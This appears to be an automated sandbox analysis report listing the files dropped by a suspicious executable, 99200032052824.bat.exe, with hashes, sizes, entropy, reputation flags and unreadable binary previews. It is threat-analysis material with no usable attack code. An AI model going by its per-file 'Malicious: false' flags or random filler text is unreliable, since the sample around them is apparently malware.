SSDEEP:	192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
MD5:	FBE295E5A1ACFBD0A6271898F885FE6A
SHA1:	D6D205922E61635472EFB13C2BB92C9AC6CB96DA
SHA-256:	A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
SHA-512:	2CB596971E504EAF1CE8E3F09719EBFB3F6234CEA5CA7B0D33EC7500832FF4B97EC2BBE15A1FBF7E6A5B02C59DB824092B9562CD8991F4D027FEAB6FD3177B06
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: INQUIRY#46789-MAY_24_PRODUCTS.exe, Detection: malicious, Browse Filename: #U4f01#U4e1a#U7a0e#U52a1#U7a3d#U67e5#U540d#U5355#U67e5#U8be2client_silent_S3471755167_.exe, Detection: malicious, Browse Filename: #U4f01#U4e1a#U7a0e#U52a1#U7a3d#U67e5#U540d#U5355#U67e5#U8be2client_silent_S3471755167_.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: PulseUpgradeHelperInstaller.msi, Detection: malicious, Browse Filename: VESSEL PARTICULARS & INSTRUCTIONS_docx.exe, Detection: malicious, Browse Filename: VESSEL PARTICULARS & INSTRUCTIONS_docx.exe, Detection: malicious, Browse Filename: 090100003400224.exe, Detection: malicious, Browse Filename: VESSEL PARTICULARS & INSTRUCTIONS_docx.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....~.\...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmc.ini

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:+gMn:8
MD5:	ECB33F100E1FCA0EB01B36757EF3CAC8
SHA1:	61DC848DD725DB72746E332D040A032C726C9816
SHA-256:	8734652A2A9E57B56D6CBD22FA9F305FC4691510606BCD2DFCA248D1BF9E79C7
SHA-512:	D56951AC8D3EB88020E79F4581CB9282CA40FAA8ADC4D2F5B8864779E28E5229F5DFE13096CF4B373BBC9BC2AC4BFC58955D9420136FB13537F11C137D633C18
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Caps]..Setting=Enabled..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Krapyls172.syg

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	4409
Entropy (8bit):	4.998325107222196
Encrypted:	false
SSDEEP:	96:Z8NR23i27mHC6ldsqGicLJ4YmJjKMt6kG7MK/e4:ZuR23yCAcPajB6V7MKT
MD5:	FE67CBDFC33E4BCA1D5DE148DFD4CCA7
SHA1:	601B7664814ACEA408AA7BBB121D5BB26301DB57
SHA-256:	67CEA0A0C921025E558737D5BB54EAD4D0E795AD3D9688A87D18C3531C9A9A10
SHA-512:	E3B9871379906B4ACB92B71A67CD85BEC1DC490CB710E39335A34DCA7DC1DD9B05F80AC8A4201C6BCB115A76E3E439134745CB08D59F111F6FC44B6DCBFD06C7
Malicious:	false
Reputation:	low
Preview:	.........p}...c..3.............4......4f..=P+.....t.........H........."..G.!7...8........eO..T......C.......2.^m..........~...#..w.............k4..7.............6.........T+.\+....................,.l...~..........._..,...G............".A..................C.Ai......0...[...K....]...........1.........'....9.....W........\F...^..............p...v.d{.y.. ...<...\|.6....P.............p..t8......4...!.......@...f......S.........[.t.t.....@................Sm...K.....}...Z...;.D.b..;ph..7...."...............W.......7......K....-.....Vn..Q..h.......M.......B5..,m.d...t..W.N........./..w....%...V....G...5......~&+.....86....k..L..Q..... QcJp................g....-.B.....Q...............S..-.l.......@............d(./.....u...0U...}m........m.......u.....B<.....................<.g................X.j.......f..F.....p0.{..r........]......N...A.9m............4=.s..........`E.&....t...........O.).R......J...................Ml.......9......\|...................`.&h/.....&..2.-........L........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Mattias.nap

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	2532
Entropy (8bit):	4.9678315283199135
Encrypted:	false
SSDEEP:	48:ufsILXIGNP20GjA52PD7Iy6o7dX3bDUiRaGCi0yy2WoHBF5d:ufsI8GN+0sAoPDs7mX3PFRoVoHz
MD5:	C6878D37B9258F8AF8406998E372374A
SHA1:	0C98231F7395C3BADD802AF8B6F54759D042B778
SHA-256:	D1437C6D99ED6EEF50164DC663DF24DF9E67783900A605B804EFB3728EEDCD69
SHA-512:	B291DFCF1EEB22C04EDAF4B43AC1AE88B69AB1E4AED7AAA55EFAB1951B6F64BB395C8242874AF449C036AD1A2C63CB0364943C03F096FA20F4A1B3C571A846DC
Malicious:	false
Preview:	..........ED.....w....g....=>.70}..l....{h........................y..N....>.....j......f...b...u}.X^.@..W...@.....y..u.....Qs........$...9.....NO...m...[....Y...g...-.....s.}.......@..a.....Z...j.......R..........6.v.........]......_.........!.a........../.1.T......Z.........jg.<........;...............f..j........MM.\.7#..........".......yH........z...........)...S.z........3.[.....1h.}"3UZ...^...O..}...........)....o.........F....{.........G.....9.e.....M.6D....fm......K..g.C..g......e....~..............t......&....7..................._/.........o.r............7.........}h...8..............!t..".t..........h...z.)..?......Q...........................q......+.J...~..+.u..X..S.`........E.Yq%....g...6...........j....X....MO.........m...c...z6..W...Q.....\|D..)......".............8..........#...t.7....c............"v................................_.\P........O...I.Y@.-.1L...m*F......q.h......{........QD.4..c....3.............K........9......>................&.k>

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Nydannelses.Aar

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	267175
Entropy (8bit):	7.5093466450966755
Encrypted:	false
SSDEEP:	6144:0bkpKe8XvlKE8doHmvveIqwPYxv9eh63gVua+orBWDar4pbq:0bkp2XkBZvvPqrl9MMgVuboVWDaiq
MD5:	EFE533BAAD77375996164F3CA96F08C7
SHA1:	61DAC0069B45D17CC6DAA70D1392A46A6CB22C55
SHA-256:	518FF4DA0147E66D5D832FA038BFAD15017A7CC81F6986492737E520A3DD6999
SHA-512:	6C02F5E7F336337DD621F0F2E95B984EB660E6F6DA8A5D0F238335D8875AA15ACC05D21796CEC2150D0122B442756B15963274D8A36A30F7793EFA97859EEB42
Malicious:	false
Preview:	....>........................1.1.......``........................#.CCCC.uuu.e............99.........tt....................LL...........55..........................].......................................................ffffffffffff...ii....:......###........... ......WWWW...............L.........................N........)).===.NN..............PPP.]].......E.g.........................a..........@@@@@...................---...8...33....................mmmmmm..SS.............jjj...CCC..YYY................................NNNNNNNN....dd...W...5.bbbb..............,......3...................##.G...............................................B.............SS...s................&&&&...........6........z......pp..f...s..```..... ...]]..............77....F...........b......---..AAAAA.............................K..))..........B.........gg...............................FFFF....%...%.{{...........qq.................ww..C.N..NN..........................3.aaa...........WW....:.yy.....x.........XX...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Sestertius.djv

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3100
Entropy (8bit):	4.748208227621493
Encrypted:	false
SSDEEP:	96:0+WozLtosUl81/8yuN9lvcoE5B9+crXOL:0+W0Pf1UysE/H9A
MD5:	175C8E8CBBA4FEE420E7131DEFEE9C57
SHA1:	ED7CA0AC22608E41CEBE91020026F4C7E30B5A42
SHA-256:	DE842BB06394A7859D97C6188D1AFA217F10784A1F564EB3E0140C94FFC90048
SHA-512:	7B88A23A4B8D767A33987478B64F73EC8DEF254042F1C3A12F0120A85DC6E072DCF641709FAA858AECD52425419FCD04B1D26AB06B18106ED436DDD7A93BEAE8
Malicious:	false
Preview:	......K.....X....~..........W..V........Z.........2O.V...../.................4.....I..G.!Y....-.e.......W.....6..........\`y........(.`W........T.........p....?..o.d^.......?A........^3h?x...... ..u......w........-.....#...B>.v.....6....n.\......L..Z...~P..................f.H./..........lw=.....6..........................\|..h..zP...)p.....B.........C.......Y.M.........X.....P...].v{7...8a.....c.....CX.\|J,..........O.}U\.K..ID.(..J..k.&..............$......e..F...w......S...%....9...g...1.....y&.............@0/........?O.Q....s......................f.=.......................,.................}............l....\|...!S....#...F..j.......k4>...R.Q.=.........\)............+....$...............G..8....<....>...\|?7.....'..............2...........s......n...O...;....]....;..8.l..!.5B@.............................{........C........d...............#.....l./....#.......-.4.WG......C...."[................#..........N.^..`..X.......]..W..{...3u.z..<..G....K........K.....!......C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Slidsomt.bra

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	7510
Entropy (8bit):	4.91720718259004
Encrypted:	false
SSDEEP:	192:fpfdSEMUTMZjVLoPmnXD3/gCu1G5xa8sAiN4Ce:fNdSTUYz8Pm74Cgc48VtV
MD5:	3C54B9521872A75B7FF9C08D5F58FC2C
SHA1:	1C8A2A51E9A78B8E1F7E91B59A3AA4D9301095CB
SHA-256:	7817A04E5EC98E43939698025A2133653F287290223320F237C12C1D3B6B126C
SHA-512:	F121270D58F6F04BF57B6A86061CCACFACA783800A43DA56EDE010B22542DF9553C237445C4E86E8D812F090D2255CD1B6540B87B25543B6BFE2DAFAF413E0D3
Malicious:	false
Preview:	.,.......z.....z..$........jK.J.w...._f...3.....<.m........!.............#..4.#..........c...40....u.~.wo......Y.......$e.()<..........................f..L...h..Q.......I.............q.J>....).....r._.el..........`....BU....1......mO....".9....I[U-.F.......[......H............Ye~...........6..............N.W....@...\|.....i..........B.......<bu..a....XX....;...W........s....uI.(.}..-.....]..A...j........."...J........c.......X.....................+.............n.......?...........T.....E........2........$...............9.A3.....2..............\.].k.Z.8.......Y.;......!.............................F...?............................w.m.........o........>.h...........0Y............?. ...V...........w.........z.........`.....4..,...'.........z..........2..............V......i...D.....[....X....5..........}.E..........=.E...F..a1O...........A.+...........c....$. M.......................4X......z......j.P.)...g..............B..S../..G...6d.....0.{..........#.......]....7..G....V..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\afslres.ten

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	2501
Entropy (8bit):	4.812074749205284
Encrypted:	false
SSDEEP:	48:YzKTprRUztTLPa86AEg32I6bSmPd30YDvSQLc3hePoE/eHv4d1w:bUu42NbBh0AaQJPIPuC
MD5:	ED9E84934782D5FDC90AC9781DC9A6E1
SHA1:	39DD2E37586C5CB5DD86A9F6A987C1FCDFF45FFF
SHA-256:	37AD2DBD7F711971FD8DDD2BD78D5BDFEAACF52724FF9D7C7FC9B293F7C9B5FE
SHA-512:	07FE7559008D6E528E8227BD64F305BA51EB739128067FCA911485F02F5A07B4531B6B5CD3D32A2CF02114CA27E64E0B32FCC1D813B55FE2EA00F33D0843D598
Malicious:	false
Preview:	*...C.....RI.......I....>f..........@.S.+...........#........f....1...2.b...c....$W.C...j....A.E...G......j....`...0.....K.............4......l%.2.....W....d.H..............W..p....x...3...j....N..W.........)...k.....B..0...h..8..P......\...P._...........6....u,$.......t..A.......n....2.p.......B.........O..\|.:....$2......P.............p........i..............J..C....-.%.c....r..d...p.$.....~.......}H......e.X......>.!.D....7.n........c.E.....+.......{...;T..6...F..n...................h.g...\.....}........gV..x.M5......t.........C..ju...6.............1......-G..............l.....................fy.........l....$................O.z.r..w.......c...Y.........".sqj. ...........E.........^r..$.t^..........r.l......).......A9.............................V>x..6P..a.....Z...........x...6,..................(.o.......2.V.........q..D.D..........B.J.(......R..Z.f.....}.....c...F5F.......I.D....>..._M..`.........f.iL..............t.........-......}.............9...........!...........D..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\discomposed.non

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	TeX font metric data
Category:	dropped
Size (bytes):	2577
Entropy (8bit):	5.07901334387277
Encrypted:	false
SSDEEP:	48:qFvj/6l92Aw0Xf3MtDM81l4U3d2pjLAFQKm12qEIVH4oqTVzj9lPj3UFhCNQ:wjGnw0fWD1l4UNYLXKBqbA/PjwhR
MD5:	5FEC97594CEB46A5C143053B0A9FA6E2
SHA1:	8B9C1B04B41BE3AE4E9D4909D873D7A3BC67272B
SHA-256:	02F91F9E1D345BD7DAA518A98B5FD84B8DAE146633A6A8F3B15C0586D8C074DE
SHA-512:	A3832EBBB5DB00C38FA4F60F9BA687499E4FCA6F5C036E4B7BD3C1F1039C0425B7B8B82D834B00E39557F40748DA5E725E6000C2A0BAD0701B11BCEDF96CF395
Malicious:	false
Preview:	.o...9T...z............K...xR`.....N........]+...............x....'.....T................(.........j....$.......>....!..........1y............i......a..../..r..d.n.......a....=>a.........j...;........U...,.....Q........P3..2.....xr..i`,..............9........~.O....C...<.........9.......OW.....5..p./.x.D,...~.....}...........-....R.......)>...M.[.................o..."...%........r......_.Y....Og......v......................w+........r.........2..................q.............Z.N.....................q`.T(...j6....t....c/.......c...1.......M............aC.......C..0...."...J.B......=............Y,....+............K/.k+Q}.........}o...\e..w...R..."...l<..../..^.S2...V....?.......e.i........\|.......a.A...V...............I........................H..J.._.........1..w.._.................)~.............U6..L..........M..J.8.9.h.4.....O.1o.....Ll...........Q..../.E=....z^.(..^0.....>.+....4.E.H.G.M...\.=......`....:...'.m..E...W....v..G"..z..........Sq...............8d...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\dred.jpg

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
Category:	dropped
Size (bytes):	23244
Entropy (8bit):	7.540912926808858
Encrypted:	false
SSDEEP:	384:wZVE8byaUmJ0B1YWBWiU+y/KnPXLeO/4NK05cT8SLs3afUXiH43j:wbrbz6HYWBWiZy/KnP49cTbfUXr
MD5:	18E048BA7596E10380F1AE242781B676
SHA1:	AEA8403BFC4B42ADDC05F6098D5EE56E8BABC532
SHA-256:	69881C64F796D9F2571116A8E6C3D9E1B77E6EB1A2CAFE6C9A333E6EE486B842
SHA-512:	E5599C1F77C9DB3E027A2B38727F374E1746DD1281F42AC6397E478B9E4FCFC5A769AE8EA3F20333A409CBBCE28CE1C7869B44336D7E4EE4D5F41609C6EE30FE
Malicious:	false
Preview:	......JFIF.............C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....?.3...?.Q...w.......5.."._............./.3L...g_..?....j.........O.>...4........0...9.......G.^............_....../.=L...V?.O.....S>g....%.W.......~.._.+...o..L....K.w.....4.x.....v...o...~Tz..I..$'........P....}._...P..~._./............n......g.e.....p.......o........_r.+.....U@.....\|..............%...]_.w..JG....w......f...~R...E..g.X..P.9...D.C.........WW

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\gametophoric.txt

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	ASCII text, with very long lines (364), with CRLF line terminators
Category:	dropped
Size (bytes):	443
Entropy (8bit):	4.26226221852899
Encrypted:	false
SSDEEP:	12:QhhpvdH/VEZ66gB2tzWlnyEKXL2WMeZ9JDHoJt:QhhFxdEZG20lKJM09Not
MD5:	052A3D0375E8EEB3A6A667ABFFC5F0EF
SHA1:	761CA63CE01BAE7BD014F1CBF299E3432604B8AE
SHA-256:	D4E94A18C627B29290276983B249D999F0F5DF0233A2D8CE187DC7978D70AA18
SHA-512:	716B27E42775AC6A96BCA6ACE56D207362AEB8889DB4DC10160A3F37D6C313E52F67EB70D8201B288B34CAF0238FC332AB7DB9297E42818FA7E963697EEC0E43
Malicious:	false
Preview:	forklike carnaubas demythologising gdedes maranhao overgangsregeringen,skabhals avaradrano socialize dyssede rreddam resorufin.molybdn inogenic fyrsteder tachograph udsavende.skovsyrerne tilkendelsernes cerning,thenabouts fjerntrafikkernes squall beclamor profounder talomraadet driftskontrollers forsikringssummernes geometricise indeterminismes isopolite adsmith..derealization eforen unilluded nondisbursable rdstensmure blighties fadllers,

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\isocola.sol

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3309
Entropy (8bit):	4.898399826501928
Encrypted:	false
SSDEEP:	96:+f7M5oZ8Y0WrHmP+DwnfcXed5TAd6pivr:+TKS8Y024TccAd6pQ
MD5:	1E5426FBAE44458D0B5526B99D0958CA
SHA1:	E0934E69B42ABFDD6695ED678077725ECF0B5084
SHA-256:	EA79B75BC89ADB3FAAFF4C957AFCD5CEEE4A40B88F22BBED3B045C659517B9A5
SHA-512:	C63CD9C148ACBEFB50F49B6168C0BD2D01D2A62629ECA8DCDFFD05A269D6092871D2CA7DFA86C3629453B8791E63F90C4A61CF6EF8E6F47194F39BAF595A7B10
Malicious:	false
Preview:	.i......~cn.?...G........1h......."Y.........in..............b...}....K.7.............Og..{................g......r.O.........u.....a..:......W.A...l......&.....B.[...<..$.....A.........k...s.\|...X...:..Y..S...3.I.. .m...b......k0..,[................(..............L;.....)..................t...Y...:... ......i..s...r...................c....=...].....Z...e..>....[......Q.H'................A.....J..m.s...q,.W.............&s.=...... .........!......t0.............L:.0..N...1......."..........Gm.......}......n............X3R....c..W...T.......4....7...'..`.....y:.......c...[..o,....6.T0...~/.....r...I.......`....`.t...........8.............7...z..............B.....Yr...7l.w.........`.....?...f....e......7.........9......b._............^...G}....G..@.m....Q.$..I........,.%.....d.....B.w......)......... ........................^...a....B..i....66.=.73......t.......r&.-......s..........F....h........]................2#....v...r$...............4.......T.....y... .x.....a.....a..M

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\malningerne.bog

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	13465
Entropy (8bit):	4.947258320601266
Encrypted:	false
SSDEEP:	192:ftl1uywODc/D4zuFLp+h9JqgH01ZFDwMVyDdb8m7wzLqb8IpcypMHKc4nqAtpGn:f/YvqWDt898gU1ZFDwMIIr94G
MD5:	2AE1A3CDABC68B7F2AA156DC80A8BA6A
SHA1:	E3065DB21D4CD531E715CB46B300FAC2A3AD2289
SHA-256:	D5443C561171FDE4676C329F857AE86851BAD9755348EC79B9B54CDB60555BBE
SHA-512:	03A1C5CD20A980A248ACF0EEAD25E0E77227F70082622BE4CB56B6F86FA3D366CB9567C4418CE2001A8534B57D77A27541F8C90BE56DE8C79E1762F4D1068BF2
Malicious:	false
Preview:	..........z..E..........w...W.2...]jD.......Ow.5......%........$..........$..o.....j.&..........`..Fuf...\.......l..e.w.:...(j....k.......q...........................U....%.....Z.T...........U..e..#%.........A...s.9......\.3....b.....E......t.... .........)...5.............}]...I..Q.......b........X:..S..[.......o.7...0...$........%...............c............l..........]...9.\|.......G.................e7.........,..........H..o......H..n..`.4....S:...3Je............)..j.m~..p-......U.....&........Y..........Q'....!........I.}.H..q..-.r..iL..-....i......./.................!..$...R.b............5........................0..@..X.>.................O......R.c..............M...........S......M...}.......A.5.........k.....M.\.................v...N............[.".B...M.....-............=..E......W...+......cE-yf..........>.5....T.................U..$\....D...........t......a.(.....U........................*..........e...X......q..f.............'........2<P.......:M.>...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\monodomous.kal

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	TTComp archive data, binary, 1K dictionary
Category:	dropped
Size (bytes):	7722
Entropy (8bit):	4.85176842716064
Encrypted:	false
SSDEEP:	192:nZFPnCY2Hm36vHT+Tm7rsMnTRmGJ/w79zdpwIf6S:7fCLHm36PT+Tm7gMTbxwxdpxz
MD5:	29907025DE7D88B9E24D525BCFCD0ACA
SHA1:	992446AAE89264303D61432F16C934781A628EB1
SHA-256:	2EE335FBD15E3E22CF0522BF4A7FA28E58C329E2B1691A01CD40DC4E18C7A4E3
SHA-512:	29215F48A2F67FCE3B25AB7F6497A27DAC1E97EA35847830706FC073558E51775371BC9FCFDDFB760832E420FAE8DA2F106B2E62418DB2004EC400FBBF067A2E
Malicious:	false
Preview:	....l.....K..F..q5}...............................h....e..&{....U+....3.........u.0..e.....?.......q..........>..........nMh.;.....+BE..s.@.........B..........F......................C......+6.........\|I.....o......=...........\.....s.......$...........Q...D..w....1.....9.A....>...k-...[.........._........;......=....p.0u..p..a[......).(.,.q.. ....................(..~y..a.3........As.................+.........Z...:.~.8...6.a..............mz......H.......%.....:....s^.......n..^....n2....b...W.V...........P........!...@\.k..>T................ @.....v....3....<.....`...X.....%..................P.....h....?....Q...Ux..........@q....../........4..........J.N.................w.......................r/.....................z^.......;..H......u....`.....e.........O.*N.#...v.........h.z.....4..+.h.E....X....~.........w............2...~..^.X.@......_....;............g.........qW.................y ......................<....n.s......!.....`....H..........(..L.......J......T.........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\ornery.cem

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3105
Entropy (8bit):	4.917605198162765
Encrypted:	false
SSDEEP:	96:qPt4g9NwI1VI64tPI9331YoNn4szSJaIryd:I4gjv2r0yoUJ/yd
MD5:	2820C0E9196BFB3569D0957C4D310813
SHA1:	44B546C5A75241DECB0D419D509D86B0F83A228F
SHA-256:	2DB6D4FE9932E4D1F9A3FCF304FB869EA176385B5BB24DF8FE1B64179D3A5F5E
SHA-512:	57DF8A0782035D14DB6D29628FF210658A5395A31C614FB55EA1C93753FD9DCD07233BCD2264F8DC6522F90DCE28A852D6A4EB6A690D8B8BE11A11A22F9A9962
Malicious:	false
Preview:	.K_.^.......(.........{,....l.o.&...... ._..U..b.....u .G.{.......m.S....~._...4..n.......'.......i_..>........j(.e../.......H.@......N.........v...l......O........5.......O9........(./.p........lV.".fU...j........%.........x.....]....q......M......'.....+..7...$.........$.....b...~......9.....V..?.\..UV...............}....h9...C......Z.....@..7......\.....n.......Z................g..................W,..0.O...M=.......'........o.+.......d.......m........J.P.$............`...m.....r..,......../.<..........k........D`.......p...1..............e...4x........E...^...d....%..................S..s............f........Y..........y............k.........p.......w..........k..\|.......:H..+I2.......)...I,...>....o..........{......~..R.?...^... .@...]......G...Ee...............]..a.........~........l........o...y..\|....c.......`dl.......{................'....J!.......g....+.v....;....3.v..t.........w.(..T.......J.>o.n.............}..Y......a....Xz..i!.........a....j..3...........i?..........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\podagrist.ref

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	9978
Entropy (8bit):	4.908627124521558
Encrypted:	false
SSDEEP:	192:lT1mzLGWI8BObOtq2V6JCGtsNigpgDjR1i8BxwYwu+p6:lTSI80bOgC6R7X+p6
MD5:	D1AA27BE4695EFFDE130C89CA7BFBC62
SHA1:	32CF0D7B76A74A29B94E3F05858E0DA7DFCC9F08
SHA-256:	F209716D597B246F27998DA4749DB45AD61A645DE446E886463D18CB54DD187D
SHA-512:	AA635DDF1F0F9A0DD7812B341C67624D193AA1BE7D0C2AA88AE64A2F51F1849323A3173EE6784D481BF91307FFF55CF66EF6271FB8CDBD901CA3000A1FAFFB71
Malicious:	false
Preview:	..;...........L...L.P.....h......Ur...B..i.....'hV..................}..dI..WN......kS...V.....................p..^C.X...?...d.....;.OU.K.............L`......}.".............................Q..........H......O.20Z................+....k..h........r...X.........................!.............u...Z.s.........'l...........z..Jn..Z..........n'.a.......~......:.........e.....a....../.....D........n.......Q.G.....j.......~...................h.......?R...........i..Py.L...............@.}....g...Y.1K(L.(..J..................}........6...........w...........r..}...$....E.@..c+.\...........Fn....].".n....M....C....Ta...f....=p..K;....U.4...x..[.'........3........._......t....T.8......i.+.q........Z...i......B...g....O....[..9.t.................b...b...d..j...+...e..M:...!....`...............y......K.........zR.........G....e?._.........................-J...a.......H....0........C......f...........h......h......(.o......%......E...............m.....Qh............................u..._8..U.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\soliloquium.bor

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3350
Entropy (8bit):	4.894453707611395
Encrypted:	false
SSDEEP:	48://vGRembfsNciS59pnhjSQZPbKDPiaI6hI2VmwLJ0z6G0mQuN4hZ:/wkNGdhjS2PbVAmwF0t0T
MD5:	16AF1A5579221F98F7A49F0A9E521704
SHA1:	B9C4E48C381998605EA86DCD99C4F116BF2D2790
SHA-256:	FDB32CC85C39D7FA95FF9634B7AB406F1959C6388A60F0ED7877EC1A492D6EE3
SHA-512:	4BF5749FFB3C367728610C3D9B8640E4A3663AACAB47C898C5C5E7DCDAB54C15E4368DF4819F2467D9E22D6716860E4F0F6DE12361F48BF8C1AFED35F2136ED9
Malicious:	false
Preview:	..'...c.k.......R...PW...D?.......5....I...F..............;..`..).#..d.....PV....$5.i....R..z.....?...=^...6..~"=........$.....Gsa..Fx;.....;...).3.............4.......I.v..~s.&......D.3[.=.......K./.}....K..................l............]@o................E....`.....V.....,...C........-1..R...o.......^.....h.....$..............f.."......C.vB.'...r.?.]........."...........o.....ss..[...b........s..m....:.R.J............)..s....pj.^O.......P$.k.r.........=.=.y".......%.1.(.{=....w...[......o.....q.......0.9......L..D.......................v........M..........<..9.......M.........I.g...Z9..q....K...........X.............U....s.M.m.*...G.....Z?..@...k....../....p..$...aJ.....d.....F....:..\. .5.........O.0.V.G........O.......X..4.....o...a...#.......v...........c8....a.........3.@...................(.......Z...........Y4.GJ.&.H..........A^....1.........`#.b...........8.............."..............$R..........w}...............C...f.{..u............{yN....w.....................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\thoroughwort.ret

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	13209
Entropy (8bit):	4.958809693126459
Encrypted:	false
SSDEEP:	384:A0BxOjCRAKa0HAMddbG798fJhmTu1US21:7S4PahS8SJpKSo
MD5:	A0EED22B474BBB911B0CBD28BDD4A543
SHA1:	3810338ADD88F5AB3837AEB87AD0C8CD66C20AEC
SHA-256:	02D407A9D84325C5A53D156AB1008A5A7DAEDBC6087C0BB21AED461976EE5EB6
SHA-512:	EAD609280EDEC21AE14B2514D2356B1B39FE3760B2419E63172EAFA095DB900069EB8D5FA36D6BEBB7A81DD3796234794D90BC0EE742542C20AE18DEE211036F
Malicious:	false
Preview:	..........Y.....2.`...`....!..~.......>.@....~b.ic....\|6.@..............m.........V.......\|"..0......N8................N...{.hB...h~.(......S.B........`.......N.......................F....C...V2.........z..............L..........................N....%........CB........................;.r............S...........q.F.1.J..?.....\|.Q......`...P.......a.z..2....b...]..D.....1D................h...q.........:.............NY....."..2..g....B..Cg......d....2n."....D.......C..M......(....F...&r.&................Z..........x.....a...;C..........U...........]#.T.C]..............M...........p.,..Q%.Z...9...m.np...H....4.e..=...........f.....%..............k.r.Q5i.e......m..\|..&..D..0....u.y.....R.P8.z...x..d...h....g................5mM.\........#Q".....z..2..^..........W....M....(................B3.../.q..t........)...U..6..................-jM...................+._.........D...........F....u./.p..................9........l#..h...T...N.\[..D...z.....J................m.....e:...N...P....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\torminal.wes

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	1918
Entropy (8bit):	4.866117324562928
Encrypted:	false
SSDEEP:	48:tcSw5sLkgw4mnWWIFDXB5yZknRnYSPv0w1s68BUmN:tcDSrgPWbB5vnRNPMys62Uq
MD5:	F5FA64BA1796D441E9069D66EAC986C9
SHA1:	D1A07F8E72F9DDEAB1CEA5AE64068C92483F9237
SHA-256:	DCADA90E85DDF4B55AFA174DA586C17DBD970C76801A526FBBFC4C73C8619E17
SHA-512:	0BB8BE2340B996061B92E7C004A301852208428961FFDCEC6909872B21E3C68D3672CEFC07231D6E05ED80A0395CA32381CF557043E76BBBD1DA1C78020AB89E
Malicious:	false
